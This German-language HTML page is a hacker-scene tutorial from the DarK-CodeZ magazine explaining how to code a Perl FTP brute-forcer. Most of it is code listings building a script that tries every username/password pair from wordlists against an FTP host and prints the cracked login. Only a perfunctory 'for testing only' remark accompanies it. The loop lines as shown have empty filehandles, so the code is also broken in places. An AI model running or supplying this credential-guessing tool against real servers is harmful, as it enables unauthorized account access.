<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content=
"HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii" />
<title>Perl Ftp-Bruter coding</title>
<link rel="stylesheet" href="../../css/code.css" type="text/css" />
</head>
<body>
<hr />
<pre>
<b>[+]</b><u>Topic: Paper</u>
<b>[+]</b><u>Von: Neo2k8</u>
<b>[+]</b><u>Return: <a href=
"javascript:history.back()">Paper</a></u>
</pre>
<hr />
<pre>
#!/usr/bin/perl -w

use warnings;
use strict;
use brain.conf; # Yeahh, this rockZ :P

-------------------------
 Perl Ftp-Bruter coding  
 written by Neo2k8      
 4 DarK-CodeZ Mag #2        
-------------------------





--------------------
- Wer isn Neo2k8 ? -
--------------------

That`s me :D Ihr kennt mich vielleicht von Dark-Codez (S-Mod),
oder von anderen Szene Boards.
Ich scripte Perl seit ~ 8 Monaten und habe sehr viel Spa&szlig; damit.
Vorher hatte ich ~ 1Jahr VB6 geproggt, fand es aber dann nicht mehr so toll.
Nunja, soviel zu mir.





----------------------
- Was wird erkl&auml;rt ? -
----------------------

Ich erkl&auml;re euch hier wie man in Perl einen einfachen FtpBruter coded.
Dieser darf nat&uuml;rlich nur zum Testen verwendet werden , is ja klar ;)
F&uuml;r weitere Codes schaut einfach mal auf DarK-CodeZ.com vorbei.




-------------------
- Start Scripting -
-------------------

So,fangen wir mal an ;)
Als erstes sollten wir nat&uuml;rlich &uuml;berlegen wie so ein Bruter 
&uuml;berhaupt funktioniert.Eigentlich ganz einfach, wenn man sein
Brain benutzt und nicht gleich drauflos proggt.

Wie funktioniert also ein solcher, indiesem Fall FtpBruter &amp; was ben&ouml;tigen wir?

    1. Aufbau einer Verbindung zum FtpServer. Erforderlich sind:
        - Host (Ip Adresse)
        - Port (standart: 21)
    
    2. Da wir bei diesem Bruter mit Wordlisten arbeiten wollen, brauchen wir 
       au&szlig;erdem noch 2 Wordlisten:
        - Userlist (Username/Nicks etc.)
        - Passlist (standart Passw&ouml;rter etc.)
        
    3. &Uuml;berpr&uuml;fung der Logindaten (Username / Passwort)
        - wenn Login korrekt : Username + Passwort ausgeben lassen &amp; bruten stoppen
        - wenn Login fail : weiter bruten


Damit h&auml;tten wir die Funktionsweise, welche wir nun in die Tat umsetzen wollen =)


    #!/usr/bin/perl

    use strict;
    use Net::FTP;
    
    
Wir starten wie jedes PerlScript mit "#!/usr/bin/perl" &amp; f&uuml;gen 2 Module hinzu.
Wozu das Modul "strict" benutzt wird sollte wohl jedem klar sein, ansonsten googled mal danach.
Das Modul "Net::FTP" brauchen wir um mit einem FtpServer kommunizieren zuk&ouml;nnen.
Funktionen &uuml;ber dieses &amp; andere Module k&ouml;nnt Ihr auf Cpan (http://search.cpan.org/) nachschauen.

Danach schreiben wir eine kleine Config, um das benutzen einfacher zu gestalten.

    
    #!/usr/bin/perl

    use strict;
    use Net::FTP;
    
    #======== Config ========#
    
    my $host = '192.168.178.63';
    my $port = 21;
    my $userlist = 'ulist.txt';
    my $passlist = 'plist.txt';
    
    #========================#
    
    
Hier kann der Benutzer folgende Dinge konfigurieren:

    - host : Ip Adresse des FtpServers
    - port : den Port den der Server benutzt (standart : 21)
    - userlist : Pfad zu einer Userliste
    - passlist : Pfad zu einer Passwortliste
    


Als n&auml;chstes m&uuml;ssen wir die Userliste &amp; die Passwortliste &ouml;ffnen.
Danach entfernen wir falls vorhanden den Zeilenumbruch jeder Zeile.
Ich kommentiere mal das Script:


    #!/usr/bin/perl 

    use strict;
    use Net::FTP;

    #======== Config ========#
    
    my $host = '192.168.178.63';
    my $port = 21;
    my $userlist = 'ulist.txt';
    my $passlist = 'plist.txt';
    
    #========================#
    
    # Hier &ouml;ffnen wir die Userlist
    open (USER,"$userlist") or die "No User_Wordlist found","\n";   
    
        # F&uuml;r jedes Wort in der Userliste wird diese foreach Schleife ausgef&uuml;hrt
        foreach my $user ()   
        {
            # Falls vorhanden wird hier der Zeilenumbruch jeder Zeile der Userliste entfernt
            chomp($user);   
            # Hier &ouml;ffnen wir die Passwortliste
            open (PASS,"$passlist") or die "No Pass_Wordlist found","\n";    
                # F&uuml;r jedes Wort in der Passwortliste wird diese foreach Schleife ausgef&uuml;hrt
                foreach my $pass ()   
                {
                    # Falls vorhanden wird hier der Zeilenumbruch jeder Zeile der Passwortliste entfernt
                    chomp($pass);   
                    
                }
        }
        
Nun schreiben wir in die 2. foreach schleife:

    my $ftp = Net::FTP-&gt;new("$host",Debug=&gt;0,Port=&gt;$port) or die "Cannot connect to $host","\n";
    
Hiermit bauen wir eine Verbindung zum FtpServer auf.Wie wir sehen werden die Daten der Config
benutzt.

Damit wir auch sehen wo unser Bruter gerade ist, lassen wir uns den aktuellen Usernamen &amp; Passwort ausgeben.
Dies schreiben wir ebenfalls in die 2. foreach Schleife:

                    system("clear");    # L&ouml;scht die Konsole (Linux)
                    system("cls");  # L&ouml;scht die Konsole (Windows)
                    print "---------------------------------","\n";
                    print "Actuelly Username : $user","\n";
                    print "Actuelly Password : $pass","\n";
                    print "---------------------------------","\n\n";



Nun sollte unser Script schonmal wie folgt aussehen:

    #!/usr/bin/perl 

    use strict;
    use Net::FTP;

    #======== Config ========#
    
    my $host = '192.168.178.63';
    my $port = 21;
    my $userlist = 'ulist.txt';
    my $passlist = 'plist.txt';
    
    #========================#

    open (USER,"$userlist") or die "No User_Wordlist found","\n";

        foreach my $user () 
        {
            chomp($user);
            open (PASS,"$passlist") or die "No Pass_Wordlist found","\n";
                foreach my $pass ()
                {
                    chomp($pass);
                    my $ftp = Net::FTP-&gt;new("$host",Debug=&gt;0,Port=&gt;$port) or die "Cannot connect to $host","\n";
                    system("clear");
                    system("cls");
                    print "---------------------------------","\n";
                    print "Actuelly Username : $user","\n";
                    print "Actuelly Password : $pass","\n";
                    print "---------------------------------","\n\n";
                }
        }

        
Da wir nat&uuml;rlich wissen m&ouml;chten ob die Attacke eventuell schon erfolgreich war, 
brauchen wir nat&uuml;rlich noch eine Abfrage die pr&uuml;ft, ob der Login korrekt war, oder fehlschlug.
Hierzu verwenden wir eine einfache IF Abfrage:

                    if ($ftp-&gt;login("$user","$pass"))   # wenn Login korrekt gebe Daten aus
                    {
                        system(clear);
                        system(cls);
                        print"-------------------------------","\n";
                        print"Login for $host cracked ","\n";
                        print"-------------------------------","\n";
                        print"Username : $user","\n";
                        print"Password : $pass","\n";
                        print"-------------------------------","\n";
                        
                        $ftp-&gt;quit;     # Verbindung schlie&szlig;en
                        exit;       # Script beenden
                    }
                    $ftp-&gt;quit;     # wenn Login fail, verbindung schlie&szlig;en
                

Ich w&uuml;rde sagen jeder wei&szlig; wo diese Abfrage hinkommt oder ? :P
OK,ok. F&uuml;r die b00ns, es kommt nat&uuml;rlich wieder in die 2. foreach Schleife =D

Nun schlie&szlig;en wir noch die beiden Wortlisten:

Nach der 2. foreach Schleife schreiben wir also "close(PASS);" .
Und ganz am ende des Scripts "close(USER);" .

Hier nochmal das "komplette Script":

---------------------------------------------------------------------------

    #!/usr/bin/perl 

    use strict;
    use Net::FTP;

    #======== Config ========#
    
    my $host = '192.168.178.63';
    my $port = 21;
    my $userlist = 'ulist.txt';
    my $passlist = 'plist.txt';
    
    #========================#

    open (USER,"$userlist") or die "No User_Wordlist found","\n";

        foreach my $user () 
        {
            chomp($user);
            open (PASS,"$passlist") or die "No Pass_Wordlist found","\n";
                foreach my $pass ()
                {
                    chomp($pass);
                    my $ftp = Net::FTP-&gt;new("$host",Debug=&gt;0,Port=&gt;$port) or die "Cannot connect to $host","\n";
                    system("clear");
                    system("cls");
                    print "---------------------------------","\n";
                    print "Actuelly Username : $user","\n";
                    print "Actuelly Password : $pass","\n";
                    print "---------------------------------","\n\n";
                    if ($ftp-&gt;login("$user","$pass"))
                    {
                        system(clear);
                        system(cls);
                        print"-------------------------------","\n";
                        print"Login for $host cracked ","\n";
                        print"-------------------------------","\n";
                        print"Username : $user","\n";
                        print"Password : $pass","\n";
                        print"-------------------------------","\n";
                        
                        $ftp-&gt;quit;
                        exit;
                    }
                        $ftp-&gt;quit;
                } # foreach pass ends
            close(PASS);
            
        } # foreach user ends
            
            
    close(USER);

    
---------------------------------------------------------------------------

So, das wars eigentlich schon, ist doch nicht schwer oder ?

GreeZ an : Sph1nX, Perforin ,Rayden, ringwrath-4, Deliruz, Zer0day und die Members =)


&copy; Paper written by Neo2k8 | 4 DarK-CodeZ.com

</pre>
</body>
</html>
